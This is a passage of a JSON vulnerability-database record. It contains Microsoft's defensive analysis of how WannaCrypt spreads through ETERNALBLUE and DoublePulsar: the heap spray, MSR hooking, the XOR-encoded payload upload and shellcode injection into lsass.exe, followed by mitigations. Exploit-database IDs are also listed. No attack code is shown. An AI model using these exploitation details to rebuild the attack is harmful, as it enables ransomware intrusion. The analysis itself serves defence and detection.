["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-06-30T15:02:19", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2017-06-30T15:02:19", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "dd7c20a69c0bda66fd3d6838cf363a04fc8491d5bedbe1f57bc9229e54c77a4b", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "4166d9c412dcd1fbbfeff20425ad5162"}, {"key": "href", "hash": "d8272541e029e5f0b1e77c3a06d01c06"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "96d5a82c7285b01222a022efcc48cebd"}, {"key": "published", "hash": "96d5a82c7285b01222a022efcc48cebd"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "b943e3715f6c77878c82e1175d6fadd2"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:89789F73D15A0B331512F90F7E692851", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "On May 12, there was a major outbreak of [WannaCrypt ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>). WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsar backdoor module leaked in April by a group calling itself Shadow Brokers.\n\nUsing ETERNALBLUE, WannaCrypt propagated as a worm on older platforms, particularly Windows 7 and Windows Server 2008 systems that haven't patched against the SMB1 vulnerability CVE-2017-0145. The resulting ransomware outbreak reached a large number of computers, even though Microsoft released security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to address the vulnerability on March 14, almost two months before the outbreak.\n\nThis post\u2014complementary to our earlier post about the [ETERNALBLUE and ETERNALROMANCE exploits released by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\u2014takes us through the WannaCrypt infection routine, providing even more detail about post-exploitation phases. It also describes other existing mitigations as well as new and upcoming mitigation and detection techniques provided by Microsoft to address similar threats.\n\n## Infection cycle\n\nThe following diagram summarizes the WannaCrypt infection cycle: initial shellcode execution, backdoor implantation and package upload, kernel and userland shellcode execution, and payload launch.\n\n\n\n_Figure 1. WannaCrypt infection cycle overview_\n\nThe file _mssecsvc.exe_ contains the main exploit code, which launches a network-level exploit and spawns the ransomware package. The exploit code targets a kernel-space vulnerability and involves multi-stage shellcode in both kernel and userland processes. Once the exploit succeeds, communication between the DoublePulsar backdoor module and _mssecsvc.exe_ is encoded using a pre-shared XOR key, allowing transmission of the main payload package and eventual execution of ransomware code.\n\n## Exploit and initial shellcodes\n\nIn an earlier [blog post](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), Viktor Brange provided a detailed analysis of the vulnerability trigger and the _instruction pointer_ control mechanism used by ETERNALBLUE. After the code achieves instruction pointer control, it focuses on acquiring persistence in kernel space using kernel shellcode and the DoublePulsar implant. It then executes the ransomware payload in user space.\n\n### Heap spray\n\nThe exploit code sprays memory on a target computer to lay out space for the first-stage shellcode. It uses non-standard SMB packet segments to make the allocated memory persistent on _hardware abstraction layer_ (HAL) memory space. It sends 18 instances of heap-spraying packets, which have direct binary representations of the first-stage shellcode.\n\n\n\n_Figure 2. Shellcode heap-spraying packet_\n\n### Initial shellcode execution: first and second stages\n\nThe exploit uses a _function-pointer overwrite _technique to direct control flow to the first-stage shellcode. This shellcode installs a second-stage shellcode as a _SYSENTER_ or _SYSCALL_ routine hook by overwriting _model-specific registers_ (MSRs). If the target system is x86-based, it hooks the SYSENTER routine by overwriting _IA32_SYSENTER_EIP_. On x64-based systems, it overwrites _IA32_LSTAR_ MSR to hook the SYSCALL routine. More information about these MSRs can be found in [Intel\u00ae 64 and IA-32 Architectures Software Developer's Manual Volume 3C](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf>).\n\n\n\n_Figure 3. First-stage shellcode for x86 systems_\n\nOriginally, the IA32_SYSENTER_EIP contains the address to _nt!KiFastCallEntry_ as its SYSENTER routine.\n\n\n\n_Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry_\n\nAfter modification by the first-stage shellcode, IA32_SYSENTER_EIP now points to the second-stage shellcode.\n\n\n\n_Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode_\n\nThe first-stage shellcode itself runs in _DISPATCH_LEVEL_. By running the second-stage shellcode as the SYSENTER routine, the first-stage code guarantees that the second-stage shellcode runs in _PASSIVE_LEVEL_, giving it access to a broader range of kernel APIs and paged-out memory. And although the second-stage shellcode delivered with this malware actually doesn't access any paged pools or call APIs that require running in PASSIVE_LEVEL, this approach allows attackers to reuse the same module for more complicated shellcode.\n\n## Backdoor implantation\n\nThe second-stage shellcode, now running on the targeted computer, generates a master XOR key for uploading the payload and other communications. It uses system-specific references, like addresses of certain APIs and structures, to randomize the key.\n\n\n\n_Figure 6. Master XOR key generation_\n\nThe second-stage shellcode implants DoublePulsar by patching the SMB1 _Transaction2 _dispatch table. It overwrites one of the reserved command handlers for the _SESSION_SETUP (0xe)_ subcommand of the Transaction2 request. This subcommand is reserved and not commonly used in regular code.\n\n\n\n_Figure 7. Copying packet-handler shellcode and overwriting the dispatch table_\n\nThe following code shows the dispatch table after the subcommand backdoor is installed.\n\n\n\n_Figure 8. Substitution of 0xe command handler_\n\n## Main package upload\n\nTo start uploading its main package, WannaCrypt sends multiple ping packets to the target, testing if its server hook has been installed. Remember that the second-stage shellcode runs as a _SYSENTER _hook\u2014there is a slight delay before it runs and installs the dispatch-table backdoor. The response to the ping packet contains the randomly generated XOR master key to be used for communication between the client and the targeted server.\n\n\n\n_Figure 9. Code that returns original XOR key_\n\nThis XOR key value is used only after some bit shuffling. The shuffling algorithm basically looks like the following Python code.\n\n\n\n_Figure 10. XOR bit-shuffling code_\n\nThe upload of the encoded payload consists of multiple packets as shown below.\n\n\n\n_Figure 11. SMB Transaction2 packet showing payload upload operation_\n\nThe hooked handler code for the unimplemented subcommand processes the packet bytes, decoding them using the pre-shared XOR key. The picture above shows that the SESSION_SETUP parameter fields are used to indicate the offset and total lengths of payload bytes. The data is 12 bytes long\u2014the first four bytes indicate total length, the next four bytes is reserved, and the last 4 bytes are the current offsets of the payload bytes in little-endian. These fields are encoded with master XOR key.\n\nBecause the reserved field is supposed to be 0, the reserved field is actually the same as the master XOR key. Going back to the packet capture above, the reserved field value is 0x38a9dbb6, which is the master XOR key. The total length is encoded as 0x38f9b8be. When this length is XORed with the master XOR key, it is 0x506308, which is the actual length of the payload bytes being uploaded. The last field is 0x38b09bb6. When XORed with the master key, this last field becomes 0, meaning this packet is the first packet of the payload upload.\n\nWhen all the packets are received, the packet handler in the second-stage shellcode jumps to the start of the decoded bytes.\n\n\n\n_Figure 12. Decoding and executing shellcode_\n\nThe transferred and decoded bytes are of size 0x50730c. As a whole, these packet bytes include kernel shellcode, userland shellcode, and the main WannaCrypt PE packages.\n\n## Executing the kernel shellcode\n\nThe kernel shellcode looks for a kernel image base and resolves essential functions by parsing PE structures. The following figure shows the APIs resolved by the shellcode:\n\n\n\n_Figure 13. Resolved kernel functions_\n\nIt uses [_ZwAllocateVirtualMemory_](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff566416\\(v=vs.85\\).aspx>) to allocate a large chunk of RWX memory (0x506d70 in this case). This memory holds the userland shellcode and the main PE packages.\n\n\n\n_Figure 14. RWX memory allocation through ZwAllocateVirtualMemory_\n\nThe kernel shellcode goes through processes on the system and injects userland shellcode to the _lsass.exe_ process using an asynchronous procedure call (APC).\n\n\n\n_Figure 15. APC routines for injecting shellcode to a thread in a userland process_\n\n## Userland shellcode\u2014the start of a new infection cycle\n\nAfter multiple calls to [_VirtualProtect_](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898\\(v=vs.85\\).aspx>) and PE layout operations, the shellcode loads a bootstrap DLL using a reflective DLL loading method. The WannaCrypt user-mode component contains this bootstrap DLL for both 64- and 32-bit Windows.\n\n\n\n_Figure 16. Bootstrap DLL functions_\n\nThis bootstrap DLL reads the main WannaCrypt payload from the resource section and writes it to a file _C:\\WINDOWS\\mssecsvc.exe_. It then launches the file using the [_CreateProcess_](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425\\(v=vs.85\\).aspx>) API. At this stage, a new infection cycle is started on the newly infected computer.\n\n \n\n\n\n_Figure 17. Dropping main payload to file system_\n\n\n\n_Figure 18. Creating the main payload process_\n\n## Mitigating and detecting WannaCrypt\n\nWannaCrypt borrowed most of its attack code from those leaked by Shadow Brokers, specifically the ETERNALBLUE kernel exploit code and the DoublePulsar kernel-level backdoor. It leverages DoublePulsar's code execution mechanisms and _asynchronous procedure calls_ (APCs) at the kernel to deliver its main infection package and ransomware payload. It also uses the system file _lsass.exe_ as its injection target.\n\n### Mitigation on newer platforms and upcoming SMB updates\n\nThe ETERNALBLUE exploit code worked only on older OSes like Windows 7 and Windows Server 2008, particularly those that have _not_ applied security updates released with security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). The exploit was limited to these platforms because it depended on executable memory allocated in kernel HAL space. Since Windows 8 and Windows Server 2012, HAL memory has stopped being executable. Also, for additional protection, predictable addresses in HAL memory space have been randomized since Windows 10 Creators Update.\n\nWith the upcoming Windows 10 Fall Creators Update (also known as RS3), many dispatch tables in legacy SMB1 drivers, including the _Transaction2_ dispatch table (_SrvTransaction2DispatchTable_) memory area, will be set to read-only as a defense-in-depth measure. The backdoor mechanism described here will be much less attractive to attackers because the mechanism will require additional exploit techniques for unlocking the memory area and overwriting function pointers. Furthermore, SMB1 has already been deprecated for years. With the RS3 releases for Windows 10 and Windows Server 2016, [SMB1 will be disabled](<https://blogs.technet.microsoft.com/filecab/2017/06/01/smb1-product-clearinghouse/>).\n\n### Hyper Guard virtualization-based security\n\nWannaCrypt employs multiple techniques to achieve full code execution on target systems. The IA32_SYSENTER_EIP modification technique used by WannaCrypt to run the main shellcode is actually commonly observed when kernel rootkits try to hook system calls. [_Kernel Patch Protection_](<https://blogs.msdn.microsoft.com/windowsvistasecurity/2006/08/12/an-introduction-to-kernel-patch-protection/>) (or PatchGuard) typically detects this technique by periodically checking for modifications of MSR values. WannaCrypt hooking, however, is too brief for PatchGuard to fire. Windows 10, armed with virtualization-based security (VBS) technologies such as [_Hyper Guard_](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>), can detect and mitigate this technique because it fires as soon as the malicious _wrmsr_ instruction to modify the MSR is executed.\n\n_To enable Hyper Guard on systems with supported processors, use Secure Boot and _[_enable Device Guard_](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>)_. Use the _[_hardware readiness tool_](<https://www.microsoft.com/en-us/download/details.aspx?id=53337>)_ to check if your hardware system supports Device Guard. Device Guard runs on the Enterprise and Education editions of Windows 10._\n\n### Post-breach detection with Windows Defender ATP\n\nIn addition to VBS mitigation provided with Hyper Guard, [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) (Windows Defender ATP) can detect injection of code to userland processes, including the method used by WannaCrypt. Our researchers have also added new detection logic so that Windows Defender ATP flags highly unusual events that involve spawning of processes from _lsass.exe_.\n\n\n\n_Figure 19. Windows Defender ATP detection of an anomalous process spawned from a system process_\n\nWhile the detection mechanism for process spawning was pushed out in response to WannaCrypt, this mechanism and detection of code injection activities also enable Windows Defender ATP customers to uncover sophisticated breaches that leverage similar attack methods.\n\n**Matt Oh** \n_Windows Defender ATP Research Team_", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/", "id": "MMPC:89789F73D15A0B331512F90F7E692851", "lastseen": "2017-06-30T16:02:27", "modified": "2017-06-30T13:00:00", "objectVersion": "1.4", "published": "2017-06-30T13:00:00", "references": [], "reporter": "msft-mmpc", "title": "Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation", "type": "mmpc", "viewCount": 38}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-06-30T16:02:27"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "_(Note: Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn May 12, there was a major outbreak of [WannaCrypt ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>). WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsar backdoor module leaked in April by a group calling itself Shadow Brokers.\n\nUsing ETERNALBLUE, WannaCrypt propagated as a worm on older platforms, particularly Windows 7 and Windows Server 2008 systems that haven't patched against the SMB1 vulnerability CVE-2017-0145. The resulting ransomware outbreak reached a large number of computers, even though Microsoft released security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to address the vulnerability on March 14, almost two months before the outbreak.\n\nThis post\u2014complementary to our earlier post about the [ETERNALBLUE and ETERNALROMANCE exploits released by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\u2014takes us through the WannaCrypt infection routine, providing even more detail about post-exploitation phases. It also describes other existing mitigations as well as new and upcoming mitigation and detection techniques provided by Microsoft to address similar threats.\n\n## Infection cycle\n\nThe following diagram summarizes the WannaCrypt infection cycle: initial shellcode execution, backdoor implantation and package upload, kernel and userland shellcode execution, and payload launch.\n\n\n\n_Figure 1. WannaCrypt infection cycle overview_\n\nThe file _mssecsvc.exe_ contains the main exploit code, which launches a network-level exploit and spawns the ransomware package. The exploit code targets a kernel-space vulnerability and involves multi-stage shellcode in both kernel and userland processes. Once the exploit succeeds, communication between the DoublePulsar backdoor module and _mssecsvc.exe_ is encoded using a pre-shared XOR key, allowing transmission of the main payload package and eventual execution of ransomware code.\n\n## Exploit and initial shellcodes\n\nIn an earlier [blog post](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), Viktor Brange provided a detailed analysis of the vulnerability trigger and the _instruction pointer_ control mechanism used by ETERNALBLUE. After the code achieves instruction pointer control, it focuses on acquiring persistence in kernel space using kernel shellcode and the DoublePulsar implant. It then executes the ransomware payload in user space.\n\n### Heap spray\n\nThe exploit code sprays memory on a target computer to lay out space for the first-stage shellcode. It uses non-standard SMB packet segments to make the allocated memory persistent on _hardware abstraction layer_ (HAL) memory space. It sends 18 instances of heap-spraying packets, which have direct binary representations of the first-stage shellcode.\n\n\n\n_Figure 2. Shellcode heap-spraying packet_\n\n### Initial shellcode execution: first and second stages\n\nThe exploit uses a _function-pointer overwrite _technique to direct control flow to the first-stage shellcode. This shellcode installs a second-stage shellcode as a _SYSENTER_ or _SYSCALL_ routine hook by overwriting _model-specific registers_ (MSRs). If the target system is x86-based, it hooks the SYSENTER routine by overwriting _IA32_SYSENTER_EIP_. On x64-based systems, it overwrites _IA32_LSTAR_ MSR to hook the SYSCALL routine. More information about these MSRs can be found in [Intel\u00ae 64 and IA-32 Architectures Software Developer's Manual Volume 3C](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf>).\n\n\n\n_Figure 3. First-stage shellcode for x86 systems_\n\nOriginally, the IA32_SYSENTER_EIP contains the address to _nt!KiFastCallEntry_ as its SYSENTER routine.\n\n\n\n_Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry_\n\nAfter modification by the first-stage shellcode, IA32_SYSENTER_EIP now points to the second-stage shellcode.\n\n\n\n_Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode_\n\nThe first-stage shellcode itself runs in _DISPATCH_LEVEL_. By running the second-stage shellcode as the SYSENTER routine, the first-stage code guarantees that the second-stage shellcode runs in _PASSIVE_LEVEL_, giving it access to a broader range of kernel APIs and paged-out memory. And although the second-stage shellcode delivered with this malware actually doesn't access any paged pools or call APIs that require running in PASSIVE_LEVEL, this approach allows attackers to reuse the same module for more complicated shellcode.\n\n## Backdoor implantation\n\nThe second-stage shellcode, now running on the targeted computer, generates a master XOR key for uploading the payload and other communications. It uses system-specific references, like addresses of certain APIs and structures, to randomize the key.\n\n\n\n_Figure 6. Master XOR key generation_\n\nThe second-stage shellcode implants DoublePulsar by patching the SMB1 _Transaction2 _dispatch table. It overwrites one of the reserved command handlers for the _SESSION_SETUP (0xe)_ subcommand of the Transaction2 request. This subcommand is reserved and not commonly used in regular code.\n\n\n\n_Figure 7. Copying packet-handler shellcode and overwriting the dispatch table_\n\nThe following code shows the dispatch table after the subcommand backdoor is installed.\n\n\n\n_Figure 8. Substitution of 0xe command handler_\n\n## Main package upload\n\nTo start uploading its main package, WannaCrypt sends multiple ping packets to the target, testing if its server hook has been installed. Remember that the second-stage shellcode runs as a _SYSENTER _hook\u2014there is a slight delay before it runs and installs the dispatch-table backdoor. The response to the ping packet contains the randomly generated XOR master key to be used for communication between the client and the targeted server.\n\n\n\n_Figure 9. Code that returns original XOR key_\n\nThis XOR key value is used only after some bit shuffling. The shuffling algorithm basically looks like the following Python code.\n\n\n\n_Figure 10. XOR bit-shuffling code_\n\nThe upload of the encoded payload consists of multiple packets as shown below.\n\n\n\n_Figure 11. SMB Transaction2 packet showing payload upload operation_\n\nThe hooked handler code for the unimplemented subcommand processes the packet bytes, decoding them using the pre-shared XOR key. The picture above shows that the SESSION_SETUP parameter fields are used to indicate the offset and total lengths of payload bytes. The data is 12 bytes long\u2014the first four bytes indicate total length, the next four bytes is reserved, and the last 4 bytes are the current offsets of the payload bytes in little-endian. These fields are encoded with master XOR key.\n\nBecause the reserved field is supposed to be 0, the reserved field is actually the same as the master XOR key. Going back to the packet capture above, the reserved field value is 0x38a9dbb6, which is the master XOR key. The total length is encoded as 0x38f9b8be. When this length is XORed with the master XOR key, it is 0x506308, which is the actual length of the payload bytes being uploaded. The last field is 0x38b09bb6. When XORed with the master key, this last field becomes 0, meaning this packet is the first packet of the payload upload.\n\nWhen all the packets are received, the packet handler in the second-stage shellcode jumps to the start of the decoded bytes.\n\n\n\n_Figure 12. Decoding and executing shellcode_\n\nThe transferred and decoded bytes are of size 0x50730c. As a whole, these packet bytes include kernel shellcode, userland shellcode, and the main WannaCrypt PE packages.\n\n## Executing the kernel shellcode\n\nThe kernel shellcode looks for a kernel image base and resolves essential functions by parsing PE structures. The following figure shows the APIs resolved by the shellcode:\n\n\n\n_Figure 13. Resolved kernel functions_\n\nIt uses [_ZwAllocateVirtualMemory_](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff566416\\(v=vs.85\\).aspx>) to allocate a large chunk of RWX memory (0x506d70 in this case). This memory holds the userland shellcode and the main PE packages.\n\n\n\n_Figure 14. RWX memory allocation through ZwAllocateVirtualMemory_\n\nThe kernel shellcode goes through processes on the system and injects userland shellcode to the _lsass.exe_ process using an asynchronous procedure call (APC).\n\n\n\n_Figure 15. APC routines for injecting shellcode to a thread in a userland process_\n\n## Userland shellcode\u2014the start of a new infection cycle\n\nAfter multiple calls to [_VirtualProtect_](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898\\(v=vs.85\\).aspx>) and PE layout operations, the shellcode loads a bootstrap DLL using a reflective DLL loading method. The WannaCrypt user-mode component contains this bootstrap DLL for both 64- and 32-bit Windows.\n\n\n\n_Figure 16. Bootstrap DLL functions_\n\nThis bootstrap DLL reads the main WannaCrypt payload from the resource section and writes it to a file _C:\\WINDOWS\\mssecsvc.exe_. It then launches the file using the [_CreateProcess_](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425\\(v=vs.85\\).aspx>) API. At this stage, a new infection cycle is started on the newly infected computer.\n\n \n\n\n\n_Figure 17. Dropping main payload to file system_\n\n\n\n_Figure 18. Creating the main payload process_\n\n## Mitigating and detecting WannaCrypt\n\nWannaCrypt borrowed most of its attack code from those leaked by Shadow Brokers, specifically the ETERNALBLUE kernel exploit code and the DoublePulsar kernel-level backdoor. It leverages DoublePulsar's code execution mechanisms and _asynchronous procedure calls_ (APCs) at the kernel to deliver its main infection package and ransomware payload. It also uses the system file _lsass.exe_ as its injection target.\n\n### Mitigation on newer platforms and upcoming SMB updates\n\nThe ETERNALBLUE exploit code worked only on older OSes like Windows 7 and Windows Server 2008, particularly those that have _not_ applied security updates released with security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). The exploit was limited to these platforms because it depended on executable memory allocated in kernel HAL space. Since Windows 8 and Windows Server 2012, HAL memory has stopped being executable. Also, for additional protection, predictable addresses in HAL memory space have been randomized since Windows 10 Creators Update.\n\nWith the upcoming Windows 10 Fall Creators Update (also known as RS3), many dispatch tables in legacy SMB1 drivers, including the _Transaction2_ dispatch table (_SrvTransaction2DispatchTable_) memory area, will be set to read-only as a defense-in-depth measure. The backdoor mechanism described here will be much less attractive to attackers because the mechanism will require additional exploit techniques for unlocking the memory area and overwriting function pointers. Furthermore, SMB1 has already been deprecated for years. With the RS3 releases for Windows 10 and Windows Server 2016, [SMB1 will be disabled](<https://blogs.technet.microsoft.com/filecab/2017/06/01/smb1-product-clearinghouse/>).\n\n### Hyper Guard virtualization-based security\n\nWannaCrypt employs multiple techniques to achieve full code execution on target systems. The IA32_SYSENTER_EIP modification technique used by WannaCrypt to run the main shellcode is actually commonly observed when kernel rootkits try to hook system calls. [_Kernel Patch Protection_](<https://blogs.msdn.microsoft.com/windowsvistasecurity/2006/08/12/an-introduction-to-kernel-patch-protection/>) (or PatchGuard) typically detects this technique by periodically checking for modifications of MSR values. WannaCrypt hooking, however, is too brief for PatchGuard to fire. Windows 10, armed with virtualization-based security (VBS) technologies such as [_Hyper Guard_](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>), can detect and mitigate this technique because it fires as soon as the malicious _wrmsr_ instruction to modify the MSR is executed.\n\n_To enable Hyper Guard on systems with supported processors, use Secure Boot and _[_enable Device Guard_](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>)_. Use the _[_hardware readiness tool_](<https://www.microsoft.com/en-us/download/details.aspx?id=53337>)_ to check if your hardware system supports Device Guard. Device Guard runs on the Enterprise and Education editions of Windows 10._\n\n### Post-breach detection with Windows Defender ATP\n\nIn addition to VBS mitigation provided with Hyper Guard, [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) (Windows Defender ATP) can detect injection of code to userland processes, including the method used by WannaCrypt. Our researchers have also added new detection logic so that Windows Defender ATP flags highly unusual events that involve spawning of processes from _lsass.exe_.\n\n\n\n_Figure 19. Windows Defender ATP detection of an anomalous process spawned from a system process_\n\nWhile the detection mechanism for process spawning was pushed out in response to WannaCrypt, this mechanism and detection of code injection activities also enable Windows Defender ATP customers to uncover sophisticated breaches that leverage similar attack methods.\n\n**Matt Oh** \n_Windows Defender ATP Research Team_", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-09-15T09:08:41", "references": [{"idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 